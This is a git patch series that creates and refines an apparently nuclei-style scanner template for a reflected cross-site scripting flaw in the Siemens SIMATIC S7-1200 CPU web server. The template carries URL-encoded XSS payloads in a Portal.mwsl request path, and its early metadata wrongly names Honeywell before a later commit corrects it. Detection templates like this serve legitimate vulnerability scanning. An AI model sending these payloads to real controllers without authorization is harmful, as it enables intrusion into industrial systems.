From f8771cea8fd11659383df19c7e5dd09fa2a23e76 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Mon, 6 Dec 2021 22:13:40 +0700
Subject: [PATCH 1/3] Create CVE-2014-3110.yaml
---
cves/2014/CVE-2014-3110.yaml | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 cves/2014/CVE-2014-3110.yaml
diff --git a/cves/2014/CVE-2014-3110.yaml b/cves/2014/CVE-2014-3110.yaml
new file mode 100644
index 0000000000..9b22f17e87
--- /dev/null
+++ b/cves/2014/CVE-2014-3110.yaml
@@ -0,0 +1,25 @@
+id: CVE-2014-3110
+
+info:
+ name: Honeywell XL Web Controller - Reflected Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
+ reference: https://www.exploit-db.com/exploits/44687
+ tags: cve,cve2014,xss,siemens
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%281%29%3B%3E&Send=Filter'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - '">'
From f0fbe930f6728c83497bab9e9728d0c9bbc9875a Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 7 Dec 2021 10:23:35 +0530
Subject: [PATCH 2/3] Update CVE-2014-3110.yaml
---
cves/2014/CVE-2014-3110.yaml | 23 +++++++++++++++--------
1 file changed, 15 insertions(+), 8 deletions(-)
diff --git a/cves/2014/CVE-2014-3110.yaml b/cves/2014/CVE-2014-3110.yaml
index 9b22f17e87..19ef427364 100644
--- a/cves/2014/CVE-2014-3110.yaml
+++ b/cves/2014/CVE-2014-3110.yaml
@@ -5,21 +5,28 @@ info:
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
- reference: https://www.exploit-db.com/exploits/44687
- tags: cve,cve2014,xss,siemens
+ reference:
+ - https://www.exploit-db.com/exploits/44749
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-3110
+ tags: cve,cve2014,xss,honeywell
requests:
- method: GET
path:
- - '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%281%29%3B%3E&Send=Filter'
+ - '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter'
matchers-condition: and
matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
- type: status
status:
- 200
-
- - type: word
- part: body
- words:
- - '">'
From 7983f04c51e792fc02855f437b6a3ed6ceb2b3f8 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 7 Dec 2021 10:28:21 +0530
Subject: [PATCH 3/3] Update and rename CVE-2014-3110.yaml to
CVE-2014-2908.yaml
---
cves/2014/{CVE-2014-3110.yaml => CVE-2014-2908.yaml} | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
rename cves/2014/{CVE-2014-3110.yaml => CVE-2014-2908.yaml} (77%)
diff --git a/cves/2014/CVE-2014-3110.yaml b/cves/2014/CVE-2014-2908.yaml
similarity index 77%
rename from cves/2014/CVE-2014-3110.yaml
rename to cves/2014/CVE-2014-2908.yaml
index 19ef427364..2b589fa8fe 100644
--- a/cves/2014/CVE-2014-3110.yaml
+++ b/cves/2014/CVE-2014-2908.yaml
@@ -1,14 +1,14 @@
-id: CVE-2014-3110
+id: CVE-2014-2908
info:
- name: Honeywell XL Web Controller - Reflected Cross-Site Scripting
+ name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
reference:
- - https://www.exploit-db.com/exploits/44749
- - https://nvd.nist.gov/vuln/detail/CVE-2014-3110
- tags: cve,cve2014,xss,honeywell
+ - https://www.exploit-db.com/exploits/44687
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-2908
+ tags: cve,cve2014,xss,siemens
requests:
- method: GET
@@ -18,9 +18,9 @@ requests:
matchers-condition: and
matchers:
- type: word
+ part: body
words:
- ""
- part: body
- type: word
part: header